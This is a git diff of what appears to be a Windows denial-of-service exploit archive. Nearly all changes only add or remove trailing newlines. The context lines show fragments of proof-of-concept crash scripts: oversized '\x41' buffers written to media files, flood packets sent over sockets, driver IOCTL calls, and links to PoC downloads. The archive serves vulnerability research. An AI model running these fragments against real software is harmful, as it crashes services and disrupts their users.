in_AVI!winampGetInModule2+0x13da: #Best Regards, -#Praveen Darshanam - +#Praveen Darshanam \ No newline at end of file diff --git a/platforms/windows/dos/14156.txt b/platforms/windows/dos/14156.txt index 1de3ae690..5e33f5330 100755 --- a/platforms/windows/dos/14156.txt +++ b/platforms/windows/dos/14156.txt @@ -74,4 +74,4 @@ XXXXX XXXXXXXX If you wish to responsibly disclose a vulnerability through full disclosure or want to join our team, fire off an email to: msrc-disclosure () hushmail com -We do have a vetting process by the way, for any Microsoft employees trying to join ;-) +We do have a vetting process by the way, for any Microsoft employees trying to join ;-) \ No newline at end of file diff --git a/platforms/windows/dos/1416.c b/platforms/windows/dos/1416.c index 11dc9686d..7290e267f 100755 --- a/platforms/windows/dos/1416.c +++ b/platforms/windows/dos/1416.c @@ -88,4 +88,4 @@ int main(int argc, char *argv[]) { return 0; } -// milw0rm.com [2006-01-14] +// milw0rm.com [2006-01-14] \ No newline at end of file diff --git a/platforms/windows/dos/1422.c b/platforms/windows/dos/1422.c index e7fa08f7e..eb2aa610a 100755 --- a/platforms/windows/dos/1422.c +++ b/platforms/windows/dos/1422.c @@ -89,4 +89,4 @@ int main(int argc, char *argv[]) { return 0; } -// milw0rm.com [2006-01-16] +// milw0rm.com [2006-01-16] \ No newline at end of file diff --git a/platforms/windows/dos/1423.html b/platforms/windows/dos/1423.html index 8741095be..f78260562 100755 --- a/platforms/windows/dos/1423.html +++ b/platforms/windows/dos/1423.html @@ -10,4 +10,4 @@ Inge Henriksen (inge.henriksen@booleansoft.com) http://ingehenriksen.blogspot.co </tr> </table> -# milw0rm.com [2006-01-18] +# milw0rm.com [2006-01-18] \ No newline at end of file diff --git a/platforms/windows/dos/14236.txt b/platforms/windows/dos/14236.txt index 118369389..f7a35218b 100755 --- a/platforms/windows/dos/14236.txt +++ b/platforms/windows/dos/14236.txt @@ -22,4 +22,4 @@ root@bt:~# echo { |nc -nv 192.168.48.134 8800 (UNKNOWN) [192.168.48.134] 8800 (?) open root@bt:~# echo { |nc -nv 192.168.48.134 8800 (UNKNOWN) [192.168.48.134] 8800 (?) : Connection refused -root@bt:~# +root@bt:~# \ No newline at end of file diff --git a/platforms/windows/dos/1424.pl b/platforms/windows/dos/1424.pl index e537f0c4d..27a2fc40d 100755 --- a/platforms/windows/dos/1424.pl +++ b/platforms/windows/dos/1424.pl @@ -9,4 +9,4 @@ $bzz .= "%.1000x\x00"; $bzz .= "\x6F\x63\x74\x65\x74\x00"; #octet $tftpudp->send($bzz); -# milw0rm.com [2006-01-19] +# milw0rm.com [2006-01-19] \ No newline at end of file diff --git a/platforms/windows/dos/14286.txt b/platforms/windows/dos/14286.txt index 870eab92a..7262ce8de 100755 --- a/platforms/windows/dos/14286.txt +++ b/platforms/windows/dos/14286.txt @@ -105,4 +105,4 @@ udpsz -C "0100 0e" -X 3 8 l 0 -l 50 -b 0x41 SERVER 16250 3000 No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/14290.py b/platforms/windows/dos/14290.py index 47f6df262..a23b62576 100755 --- a/platforms/windows/dos/14290.py +++ b/platforms/windows/dos/14290.py @@ -43,5 +43,4 @@ try: out_file.close() raw_input("\nExploit file created!\n") except: - print "Error" - + print "Error" \ No newline at end of file diff --git a/platforms/windows/dos/14344.c b/platforms/windows/dos/14344.c index 575cb5542..b03daf79e 100755 --- a/platforms/windows/dos/14344.c +++ b/platforms/windows/dos/14344.c @@ -267,4 +267,4 @@ int main(int argc, char *argv[]) printf("\nIt is done!\n"); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/14346.txt b/platforms/windows/dos/14346.txt index 6b9b2df3f..f48197c11 100755 --- a/platforms/windows/dos/14346.txt +++ b/platforms/windows/dos/14346.txt @@ -33,4 +33,4 @@ - PoC: http://www.zeroscience.mk/codes/zsl_poc17.shw.rar or -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14346.rar (zsl_poc17.shw.rar) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14346.rar (zsl_poc17.shw.rar) \ No newline at end of file diff --git a/platforms/windows/dos/14380.py b/platforms/windows/dos/14380.py index 78e6a7d4e..f95aaae5e 100755 --- a/platforms/windows/dos/14380.py +++ b/platforms/windows/dos/14380.py @@ -65,6 +65,4 @@ else: # END -# (2010-07-15) - Inj3ct0r.com - - - +# (2010-07-15) - Inj3ct0r.com - \ No newline at end of file diff --git a/platforms/windows/dos/14408.py b/platforms/windows/dos/14408.py index 933df5a80..3210a8d28 100755 --- a/platforms/windows/dos/14408.py +++ b/platforms/windows/dos/14408.py @@ -45,4 +45,4 @@ except: da = "p" da += "W00T" + ("\x41" * 10000) -s.sendto(da, (host, port)) +s.sendto(da, (host, port)) \ No newline at end of file diff --git a/platforms/windows/dos/14414.txt b/platforms/windows/dos/14414.txt index d0ddd0290..e02ef0f89 100755 --- a/platforms/windows/dos/14414.txt +++ b/platforms/windows/dos/14414.txt @@ -79,4 +79,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sp No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/14424.txt b/platforms/windows/dos/14424.txt index b9f719bf2..38880428f 100755 --- a/platforms/windows/dos/14424.txt +++ b/platforms/windows/dos/14424.txt @@ -89,4 +89,4 @@ tuned to work with the F.E.A.R. series, so Project Origin included. No fix. -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/14511.pl b/platforms/windows/dos/14511.pl index a2964cc7a..075909a60 100755 --- a/platforms/windows/dos/14511.pl +++ b/platforms/windows/dos/14511.pl @@ -15,4 +15,4 @@ my $file="madjix.cps"; my $dz="\x41" x 5000 ; open(MYFILE,'>>MadjiX.cps'); print MYFILE $dz; -close(MYFILE); +close(MYFILE); \ No newline at end of file diff --git a/platforms/windows/dos/14515.pl b/platforms/windows/dos/14515.pl index 3da860324..dfdc6b6d3 100755 --- a/platforms/windows/dos/14515.pl +++ b/platforms/windows/dos/14515.pl @@ -11,5 +11,4 @@ my $junk= "\x41" x 1000000; open($FILE, ">$file"); print($FILE $junk); close($FILE); -print("exploit created successfully"); - +print("exploit created successfully"); \ No newline at end of file diff --git a/platforms/windows/dos/14525.pl b/platforms/windows/dos/14525.pl index 51370a12a..6671354a8 100755 --- a/platforms/windows/dos/14525.pl +++ b/platforms/windows/dos/14525.pl @@ -23,5 +23,4 @@ my $junk= "\x41" x 1000000; open($FILE, ">$file"); print($FILE $junk); close($FILE); -print("exploit created successfully"); - +print("exploit created successfully"); \ No newline at end of file diff --git a/platforms/windows/dos/14533.txt b/platforms/windows/dos/14533.txt index bcf691579..08289de93 100755 --- a/platforms/windows/dos/14533.txt +++ b/platforms/windows/dos/14533.txt @@ -161,13 +161,4 @@ Not yet. Vendor Status: ============== 2010/08/02 - Vendor notified. -2010/08/03 - Public Disclosed. - - - - - - - - - +2010/08/03 - Public Disclosed. \ No newline at end of file diff --git a/platforms/windows/dos/14545.txt b/platforms/windows/dos/14545.txt index 4746ccd44..73a82dfac 100755 --- a/platforms/windows/dos/14545.txt +++ b/platforms/windows/dos/14545.txt @@ -23,4 +23,4 @@ print($FILE $junk); close($FILE); -print("[+] Your Exploit was created successfully"); +print("[+] Your Exploit was created successfully"); \ No newline at end of file diff --git a/platforms/windows/dos/14607.py b/platforms/windows/dos/14607.py index 016d9823c..14c259121 100755 --- a/platforms/windows/dos/14607.py +++ b/platforms/windows/dos/14607.py @@ -71,4 +71,4 @@ def run(): except Exception: pass s.close() -run() +run() \ No newline at end of file diff --git a/platforms/windows/dos/14608.txt b/platforms/windows/dos/14608.txt index e672f5246..7b4f57557 100755 --- a/platforms/windows/dos/14608.txt +++ b/platforms/windows/dos/14608.txt @@ -397,4 +397,4 @@ Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkxhpQ0ACgkQyNibggitWa3Q7gCfVgpuM7KDIIZ30RhJ9zPCOhl+ 37IAoLMnTLUuZbvGpDlpjqmft5z0AFZ+ =ECTt ------END PGP SIGNATURE----- +-----END PGP SIGNATURE----- \ No newline at end of file diff --git a/platforms/windows/dos/14609.py b/platforms/windows/dos/14609.py index 01bcf8c30..291525a61 100755 --- a/platforms/windows/dos/14609.py +++ b/platforms/windows/dos/14609.py @@ -73,4 +73,4 @@ while 1: client_socket.send(response); except socket.error, e: pass; - client_socket.close(); + client_socket.close(); \ No newline at end of file diff --git a/platforms/windows/dos/14611.c b/platforms/windows/dos/14611.c index dda47f42e..ce63592fa 100755 --- a/platforms/windows/dos/14611.c +++ b/platforms/windows/dos/14611.c @@ -26,4 +26,4 @@ PostMessage (hwnd, 0x4c, 0x4, 0x80000000); return 0; -) +) \ No newline at end of file diff --git a/platforms/windows/dos/14646.py b/platforms/windows/dos/14646.py index f46d31798..292cc7692 100755 --- a/platforms/windows/dos/14646.py +++ b/platforms/windows/dos/14646.py @@ -42,5 +42,4 @@ data = s.recv(1024) s.close() print 'Received', repr(data) -print service + " crashed" - +print service + " crashed" \ No newline at end of file diff --git a/platforms/windows/dos/14666.txt b/platforms/windows/dos/14666.txt index 0deb4b480..c5dbda548 100755 --- a/platforms/windows/dos/14666.txt +++ b/platforms/windows/dos/14666.txt @@ -214,4 +214,4 @@ Approximate time to fix was 270 days. Srsly. References ----------------------- -None. +None. \ No newline at end of file diff --git a/platforms/windows/dos/14668.txt b/platforms/windows/dos/14668.txt index 0388f4a55..0df4df886 100755 --- a/platforms/windows/dos/14668.txt +++ b/platforms/windows/dos/14668.txt @@ -248,4 +248,4 @@ References ----------------------- - http://msdn.microsoft.com/en-us/library/ms648001%28VS.85%29.aspx - SetMenuItemInfo Function + SetMenuItemInfo Function \ No newline at end of file diff --git a/platforms/windows/dos/14679.pl b/platforms/windows/dos/14679.pl index 660cea43b..477102579 100755 --- a/platforms/windows/dos/14679.pl +++ b/platforms/windows/dos/14679.pl @@ -13,4 +13,4 @@ open FILE, ">crash.vbs"; print FILE 'a'x44000; -close FILE; +close FILE; \ No newline at end of file diff --git a/platforms/windows/dos/14685.pl b/platforms/windows/dos/14685.pl index 3bb4e6c48..7a158f0c8 100755 --- a/platforms/windows/dos/14685.pl +++ b/platforms/windows/dos/14685.pl @@ -9,4 +9,4 @@ $buff="A" x 100000; open (myfile , ">>d4rk.wav"); print myfile $buff; -close (myfile); +close (myfile); \ No newline at end of file diff --git a/platforms/windows/dos/14687.txt b/platforms/windows/dos/14687.txt index cbff9a1ac..0017c7512 100755 --- a/platforms/windows/dos/14687.txt +++ b/platforms/windows/dos/14687.txt @@ -233,4 +233,4 @@ Disclosure Timeline (YYYY/MM/DD): products 2010.08.17: SonicWALL sends me there advisory draft 2010.08.18: Ask SonicWALL for credits in there advisory -2010.08.19: Release of this advisory +2010.08.19: Release of this advisory \ No newline at end of file diff --git a/platforms/windows/dos/14689.pl b/platforms/windows/dos/14689.pl index 553d66ae6..7afc24ff0 100755 --- a/platforms/windows/dos/14689.pl +++ b/platforms/windows/dos/14689.pl @@ -11,4 +11,4 @@ my $hd = "#EXTM3U\n"; my $jnk="http://"."\x41" x 100000 ; open(MYFILE,'>>d4rk.m3u'); print MYFILE $hd.$jnk; -close(MYFILE); +close(MYFILE); \ No newline at end of file diff --git a/platforms/windows/dos/14690.pl b/platforms/windows/dos/14690.pl index cbc00edc4..730ae0aad 100755 --- a/platforms/windows/dos/14690.pl +++ b/platforms/windows/dos/14690.pl @@ -11,4 +11,4 @@ my $hd = "#EXTM3U\n"; my $jnk="http://"."\x41" x 100000 ; open(MYFILE,'>>d4rk.m3u'); print MYFILE $hd.$jnk; -close(MYFILE); +close(MYFILE); \ No newline at end of file diff --git a/platforms/windows/dos/14695.pl b/platforms/windows/dos/14695.pl index 263331ba3..94bc52de1 100755 --- a/platforms/windows/dos/14695.pl +++ b/platforms/windows/dos/14695.pl @@ -9,4 +9,4 @@ $buff="A" x 10000; open (myfile , ">>PASS.PK2"); print myfile $buff; -close (myfile); +close (myfile); \ No newline at end of file diff --git a/platforms/windows/dos/14699.py b/platforms/windows/dos/14699.py index 9c6ca5f41..12b86cafe 100755 --- a/platforms/windows/dos/14699.py +++ b/platforms/windows/dos/14699.py @@ -17,4 +17,4 @@ try: print "[+] Load this File to PlayPad Player, you can see a Crash\n" print "[+] Coded by Praveen Darshanam\n" except: - print "[+] Unable to Create File" + print "[+] Unable to Create File" \ No newline at end of file diff --git a/platforms/windows/dos/147.c b/platforms/windows/dos/147.c index 2d8943098..f999a435f 100755 --- a/platforms/windows/dos/147.c +++ b/platforms/windows/dos/147.c @@ -252,4 +252,4 @@ exit(1); } -// milw0rm.com [2004-01-23] +// milw0rm.com [2004-01-23] \ No newline at end of file diff --git a/platforms/windows/dos/14705.c b/platforms/windows/dos/14705.c index 0b30a93e6..6e9f9ceb6 100755 --- a/platforms/windows/dos/14705.c +++ b/platforms/windows/dos/14705.c @@ -177,4 +177,4 @@ BOOL BreakpointRetrieve(HANDLE hProcess, void *addr, char *originalByte){ VirtualProtectEx(hProcess, addr, 1, oldProtect, &oldProtect)) return TRUE; else return FALSE; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/14711.py b/platforms/windows/dos/14711.py index 5089238d7..12955da36 100755 --- a/platforms/windows/dos/14711.py +++ b/platforms/windows/dos/14711.py @@ -18,4 +18,4 @@ file.writelines(junk) file.close() print "Two Files Created " print "[+]Usage: Load both of Created Files in player and click on Automix Button :)" -raw_input() +raw_input() \ No newline at end of file diff --git a/platforms/windows/dos/1475.html b/platforms/windows/dos/1475.html index ce94918f2..dc0d0ea5e 100755 --- a/platforms/windows/dos/1475.html +++ b/platforms/windows/dos/1475.html @@ -20,4 +20,4 @@ <BGSOUND SRC=file://------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- > -# milw0rm.com [2006-02-07] +# milw0rm.com [2006-02-07] \ No newline at end of file diff --git a/platforms/windows/dos/148.sh b/platforms/windows/dos/148.sh index a7dba77c4..130a21ee0 100755 --- a/platforms/windows/dos/148.sh +++ b/platforms/windows/dos/148.sh @@ -50,4 +50,4 @@ done; -# milw0rm.com [2004-01-25] +# milw0rm.com [2004-01-25] \ No newline at end of file diff --git a/platforms/windows/dos/14824.txt b/platforms/windows/dos/14824.txt index 844ad1986..464b67e84 100755 --- a/platforms/windows/dos/14824.txt +++ b/platforms/windows/dos/14824.txt @@ -157,4 +157,4 @@ arg1=String(9236, "A") target.AppName = arg1 -</script> +</script> \ No newline at end of file diff --git a/platforms/windows/dos/14832.rb b/platforms/windows/dos/14832.rb index 5dce78cd4..e2f1f2026 100755 --- a/platforms/windows/dos/14832.rb +++ b/platforms/windows/dos/14832.rb @@ -12,4 +12,4 @@ junk = "\x41" * 20000 File.open("crash.wav", 'w') do |b| b.write junk -end +end \ No newline at end of file diff --git a/platforms/windows/dos/14840.py b/platforms/windows/dos/14840.py index 34f1fb198..6d3440b9e 100755 --- a/platforms/windows/dos/14840.py +++ b/platforms/windows/dos/14840.py @@ -29,4 +29,4 @@ try: count = count+1; print count; except: - print "Successfully Crashed!"; + print "Successfully Crashed!"; \ No newline at end of file diff --git a/platforms/windows/dos/14843.txt b/platforms/windows/dos/14843.txt index 12582a05b..b7275d883 100755 --- a/platforms/windows/dos/14843.txt +++ b/platforms/windows/dos/14843.txt @@ -331,4 +331,4 @@ A metasploit module should be available soon since I sent the exploit details to addr = 354552864; // 0x15220C20 [pUnk] var obj= '<' + 'object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0"'+'>' +'<' + 'PARAM name="_Marshaled_pUnk" value="'+addr+'"' + '/>' - +'<'+'/'+'object>'; + +'<'+'/'+'object>'; \ No newline at end of file diff --git a/platforms/windows/dos/14852.txt b/platforms/windows/dos/14852.txt index aca090906..2cc95a1cf 100755 --- a/platforms/windows/dos/14852.txt +++ b/platforms/windows/dos/14852.txt @@ -149,4 +149,4 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4961.php argCount = 1 arg1=String(9236, "A") target.DestinationPath = arg1 - </script> + </script> \ No newline at end of file diff --git a/platforms/windows/dos/14869.py b/platforms/windows/dos/14869.py index 00fb86c90..3686f9ceb 100755 --- a/platforms/windows/dos/14869.py +++ b/platforms/windows/dos/14869.py @@ -328,7 +328,4 @@ if __name__=='__main__': myfpx = open(str(sys.argv[1]), 'wb+') myfpx.write(fpx) else: - print ("\n usage: \n\n %s filename.fpx" %str(sys.argv[0])) - - - + print ("\n usage: \n\n %s filename.fpx" %str(sys.argv[0])) \ No newline at end of file diff --git a/platforms/windows/dos/1488.txt b/platforms/windows/dos/1488.txt index e941922e3..ef4d58bf5 100755 --- a/platforms/windows/dos/1488.txt +++ b/platforms/windows/dos/1488.txt @@ -6,4 +6,4 @@ Language=0x419 Ðóññêèé [INFOTYPES] -# milw0rm.com [2006-02-10] +# milw0rm.com [2006-02-10] \ No newline at end of file diff --git a/platforms/windows/dos/14882.txt b/platforms/windows/dos/14882.txt index e66270692..9f28ba990 100755 --- a/platforms/windows/dos/14882.txt +++ b/platforms/windows/dos/14882.txt @@ -120,5 +120,4 @@ Stack Reproduction Use attached PoC: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14882.rar (FFDshowSEHExceptionleadingtoNULLpointeronRead.rar) - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14882.rar (FFDshowSEHExceptionleadingtoNULLpointeronRead.rar) \ No newline at end of file diff --git a/platforms/windows/dos/14892.py b/platforms/windows/dos/14892.py index 273081880..0c5c48177 100755 --- a/platforms/windows/dos/14892.py +++ b/platforms/windows/dos/14892.py @@ -48,5 +48,4 @@ wizz = open("Mahboul-3lik.xspf","w") wizz.write(data1 + buff + data2) wizz.close() - - + \ No newline at end of file diff --git a/platforms/windows/dos/14916.py b/platforms/windows/dos/14916.py index dfe736919..2fdccae28 100755 --- a/platforms/windows/dos/14916.py +++ b/platforms/windows/dos/14916.py @@ -46,5 +46,4 @@ while 1: break sys.stdout.write(buf) -s.close() - +s.close() \ No newline at end of file diff --git a/platforms/windows/dos/14937.py b/platforms/windows/dos/14937.py index b2821a111..a66b2a21a 100755 --- a/platforms/windows/dos/14937.py +++ b/platforms/windows/dos/14937.py @@ -19,6 +19,4 @@ wizz = open("Mahboul-3lik.wav","w") wizz.write(boom + buff ) wizz.close() - - - + \ No newline at end of file diff --git a/platforms/windows/dos/14949.py b/platforms/windows/dos/14949.py index 0c6eb6a38..2241844f9 100755 --- a/platforms/windows/dos/14949.py +++ b/platforms/windows/dos/14949.py @@ -149,5 +149,4 @@ myStyle = myStyle +""" """ cssFile = open("abyssssec.xml","w") cssFile.write(myStyle) -cssFile.close() - +cssFile.close() \ No newline at end of file diff --git a/platforms/windows/dos/14987.py b/platforms/windows/dos/14987.py index aec332f85..999110a73 100755 --- a/platforms/windows/dos/14987.py +++ b/platforms/windows/dos/14987.py @@ -30,4 +30,4 @@ if __name__ == '__main__': driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, CREATE_ALWAYS, 0, None) in_data=1024*'\x80' - dev_ioctl = kernel32.DeviceIoControl(driver_handle1, 0x80030004, in_data,500, 0, 0,byref(dwReturn), None) + dev_ioctl = kernel32.DeviceIoControl(driver_handle1, 0x80030004, in_data,500, 0, 0,byref(dwReturn), None) \ No newline at end of file diff --git a/platforms/windows/dos/14990.txt b/platforms/windows/dos/14990.txt index a84482026..f2348a6d6 100755 --- a/platforms/windows/dos/14990.txt +++ b/platforms/windows/dos/14990.txt @@ -42,6 +42,4 @@ print ("import this accountlist.csv from your Server") # ..::[ SONiC ]::.. aka the_M4LW4R3 -# Inj3ct0r.com [2010-08-12] - - +# Inj3ct0r.com [2010-08-12] \ No newline at end of file diff --git a/platforms/windows/dos/1500.cpp b/platforms/windows/dos/1500.cpp index a6dd8863c..938047023 100755 --- a/platforms/windows/dos/1500.cpp +++ b/platforms/windows/dos/1500.cpp @@ -140,4 +140,4 @@ int main(void) return 1; } -// milw0rm.com [2006-02-15] +// milw0rm.com [2006-02-15] \ No newline at end of file diff --git a/platforms/windows/dos/15008.py b/platforms/windows/dos/15008.py index 019bffc98..17e3d0f71 100755 --- a/platforms/windows/dos/15008.py +++ b/platforms/windows/dos/15008.py @@ -59,4 +59,4 @@ try: smtpObj.sendmail(sender, receivers, message) print "Successfully sent email" except SMTPException: - print "Error: unable to send email" + print "Error: unable to send email" \ No newline at end of file diff --git a/platforms/windows/dos/15027.py b/platforms/windows/dos/15027.py index 165c3f68a..3f28e27e7 100755 --- a/platforms/windows/dos/15027.py +++ b/platforms/windows/dos/15027.py @@ -52,4 +52,4 @@ myStyle = myStyle + """ """ cssFile = open("Abysssec.html","w") cssFile.write(myStyle) -cssFile.close() +cssFile.close() \ No newline at end of file diff --git a/platforms/windows/dos/15032.py b/platforms/windows/dos/15032.py index 1defca6b5..32643b481 100755 --- a/platforms/windows/dos/15032.py +++ b/platforms/windows/dos/15032.py @@ -18,4 +18,4 @@ junk = "\x41" * 25000 file = open('blah.wav','w') file.write(junk) -file.close() +file.close() \ No newline at end of file diff --git a/platforms/windows/dos/15034.txt b/platforms/windows/dos/15034.txt index 39b9f9df9..a5aba96ad 100755 --- a/platforms/windows/dos/15034.txt +++ b/platforms/windows/dos/15034.txt @@ -5,4 +5,4 @@ # Version: winxp/sp3 # Tested on: winxp/sp2/sp3 -BMP File: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15034.zip +BMP File: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15034.zip \ No newline at end of file diff --git a/platforms/windows/dos/15035.py b/platforms/windows/dos/15035.py index 479f13b57..ea1aed8b9 100755 --- a/platforms/windows/dos/15035.py +++ b/platforms/windows/dos/15035.py @@ -12911,4 +12911,4 @@ if __name__=='__main__': myfli = open(str(sys.argv[1]), 'wb+') myfli.write(fli) else: - print ("\n usage: \n\n %s filename.fli" %str(sys.argv[0])) + print ("\n usage: \n\n %s filename.fli" %str(sys.argv[0])) \ No newline at end of file diff --git a/platforms/windows/dos/15065.txt b/platforms/windows/dos/15065.txt index 0c9d5f912..36aca4e0e 100755 --- a/platforms/windows/dos/15065.txt +++ b/platforms/windows/dos/15065.txt @@ -18,4 +18,4 @@ CVE : CVE-2010-1248 here is BA : http://www.exploit-db.com/moaub-21-microsoft-excel-wopt-record-parsing-heap-memory-corruption/ -here is the PoC : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15065.rar (moaub-21-exploit.rar) +here is the PoC : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15065.rar (moaub-21-exploit.rar) \ No newline at end of file diff --git a/platforms/windows/dos/15076.py b/platforms/windows/dos/15076.py index 38598ee41..da9cc484d 100755 --- a/platforms/windows/dos/15076.py +++ b/platforms/windows/dos/15076.py @@ -47,5 +47,4 @@ pocFile.write(sampleFile.read(-1)) sampleFile.close() pocFile.seek(13168) pocFile.write("\xff\xff\xff\xff\x11\x11") -pocFile.close() - +pocFile.close() \ No newline at end of file diff --git a/platforms/windows/dos/15103.py b/platforms/windows/dos/15103.py index 331c278b1..1e46a205f 100755 --- a/platforms/windows/dos/15103.py +++ b/platforms/windows/dos/15103.py @@ -33,4 +33,4 @@ if __name__ == '__main__': driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, CREATE_ALWAYS, 0, None) - dev_ioctl = kernel32.DeviceIoControl(driver_handle1, 0xb204c, in_data,0, out_data, 0,byref(dwReturn), None) + dev_ioctl = kernel32.DeviceIoControl(driver_handle1, 0xb204c, in_data,0, out_data, 0,byref(dwReturn), None) \ No newline at end of file diff --git a/platforms/windows/dos/15104.py b/platforms/windows/dos/15104.py index 8324d9710..e0d7d0c11 100755 --- a/platforms/windows/dos/15104.py +++ b/platforms/windows/dos/15104.py @@ -43,4 +43,4 @@ myStyle = myStyle + ",url('type/filename.otf') format('opentype');\n"; myStyle = myStyle + "}\n"; cssFile = open("style2.css","w") cssFile.write(myStyle) -cssFile.close() +cssFile.close() \ No newline at end of file diff --git a/platforms/windows/dos/15148.txt b/platforms/windows/dos/15148.txt index 55755aaa0..90abb402a 100755 --- a/platforms/windows/dos/15148.txt +++ b/platforms/windows/dos/15148.txt @@ -18,4 +18,4 @@ CVE : CVE-2010-1245 here is BA : http://www.exploit-db.com/moaub-29-microsoft-excel-sxview-record-parsing-memory-corruption/ -here is the PoC : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15148.rar (moaub-29-exploit.rar) +here is the PoC : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15148.rar (moaub-29-exploit.rar) \ No newline at end of file diff --git a/platforms/windows/dos/15229.pl b/platforms/windows/dos/15229.pl index 7e7069b9b..6f63204d2 100755 --- a/platforms/windows/dos/15229.pl +++ b/platforms/windows/dos/15229.pl @@ -9,4 +9,4 @@ my $junk= "\x41" x 218 ; #Application will crash with 218 bytes, more will do the job too open(file,">crash.m3u"); print file $junk ; -close(file); +close(file); \ No newline at end of file diff --git a/platforms/windows/dos/15243.html b/platforms/windows/dos/15243.html index 6d2087290..38f95af59 100755 --- a/platforms/windows/dos/15243.html +++ b/platforms/windows/dos/15243.html @@ -12,4 +12,4 @@ Tested with: Windows XP sp3 (5.1.2600) MSIE 7.0.5730.13 MSIE 8.0.6001.18702 -Sun Java Version 6 Update 20 1.6.0_20-b02 +Sun Java Version 6 Update 20 1.6.0_20-b02 \ No newline at end of file diff --git a/platforms/windows/dos/15250.py b/platforms/windows/dos/15250.py index acde7e1eb..ed236c430 100755 --- a/platforms/windows/dos/15250.py +++ b/platforms/windows/dos/15250.py @@ -12,6 +12,4 @@ junk="\x41" * 7000 FILE=open(outfile, "w") FILE.write(junk) FILE.close() -print "[+] File created succesufully , copy the file into the skin folder , open the aplication and select skin1 [+]" - - +print "[+] File created succesufully , copy the file into the skin folder , open the aplication and select skin1 [+]" \ No newline at end of file diff --git a/platforms/windows/dos/15267.py b/platforms/windows/dos/15267.py index 30100a7e2..59f535715 100755 --- a/platforms/windows/dos/15267.py +++ b/platforms/windows/dos/15267.py @@ -30,4 +30,4 @@ def main(): os.system(path+" "+args+" "+crash) #Crash! if __name__=="__main__": - main() + main() \ No newline at end of file diff --git a/platforms/windows/dos/153.c b/platforms/windows/dos/153.c index f83c9d78c..5d1369a41 100755 --- a/platforms/windows/dos/153.c +++ b/platforms/windows/dos/153.c @@ -326,4 +326,4 @@ int main( int argc, char *argv[] ) -// milw0rm.com [2004-02-14] +// milw0rm.com [2004-02-14] \ No newline at end of file diff --git a/platforms/windows/dos/15301.pl b/platforms/windows/dos/15301.pl index e3890ccfb..f8211d96d 100755 --- a/platforms/windows/dos/15301.pl +++ b/platforms/windows/dos/15301.pl @@ -148,4 +148,4 @@ print "\n"; header(); code(); -#EOF +#EOF \ No newline at end of file diff --git a/platforms/windows/dos/15305.pl b/platforms/windows/dos/15305.pl index ed9dd87c9..64218fc49 100755 --- a/platforms/windows/dos/15305.pl +++ b/platforms/windows/dos/15305.pl @@ -24,4 +24,4 @@ my $junk = "\x41" x 2157; open($FILE,">$file"); print $FILE $junk; print "\ncrash.m3u file created successfully\n1.) Open it with RarmaRadio\n2.) Application failure...\n"; -close($FILE); +close($FILE); \ No newline at end of file diff --git a/platforms/windows/dos/15307.py b/platforms/windows/dos/15307.py index 5976c9e38..990638e73 100755 --- a/platforms/windows/dos/15307.py +++ b/platforms/windows/dos/15307.py @@ -96,7 +96,4 @@ def main(): time.sleep(1) s.close() if __name__=="__main__": - main() - - - + main() \ No newline at end of file diff --git a/platforms/windows/dos/1531.pl b/platforms/windows/dos/1531.pl index e3b87b1c6..e755183af 100755 --- a/platforms/windows/dos/1531.pl +++ b/platforms/windows/dos/1531.pl @@ -48,4 +48,4 @@ $exploit_string .= "C" x 1026; print "ArgoSoft FTP Server - PoC Exploit\nhttps://www.securinfos.info\n\nUsing: $0 host port username password [debug: 1 or 0]\n\n"; } -# milw0rm.com [2006-02-25] +# milw0rm.com [2006-02-25] \ No newline at end of file diff --git a/platforms/windows/dos/15319.pl b/platforms/windows/dos/15319.pl index 35717986b..320871452 100755 --- a/platforms/windows/dos/15319.pl +++ b/platforms/windows/dos/15319.pl @@ -27,4 +27,4 @@ ## ## ## -## +## \ No newline at end of file diff --git a/platforms/windows/dos/15334.py b/platforms/windows/dos/15334.py index 3df0b8eca..7626af27b 100755 --- a/platforms/windows/dos/15334.py +++ b/platforms/windows/dos/15334.py @@ -25,4 +25,4 @@ port = 8080 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) -s.send('\x00'*2048) +s.send('\x00'*2048) \ No newline at end of file diff --git a/platforms/windows/dos/1535.c b/platforms/windows/dos/1535.c index 4c3055baa..a8829c655 100755 --- a/platforms/windows/dos/1535.c +++ b/platforms/windows/dos/1535.c @@ -226,4 +226,4 @@ u_int resolv(char *host) { } #endif -// milw0rm.com [2006-02-27] +// milw0rm.com [2006-02-27] \ No newline at end of file diff --git a/platforms/windows/dos/15378.py b/platforms/windows/dos/15378.py index 046e4d5e4..bc3f47cd6 100755 --- a/platforms/windows/dos/15378.py +++ b/platforms/windows/dos/15378.py @@ -30,8 +30,4 @@ crash=sql+buf+"="+buf f=open("crash.sql",'w') f.write(crash) -f.close() - - - - +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/15384.c b/platforms/windows/dos/15384.c index c0dbc93bb..cfced571d 100755 --- a/platforms/windows/dos/15384.c +++ b/platforms/windows/dos/15384.c @@ -61,5 +61,4 @@ int main(int argc, char **argv) 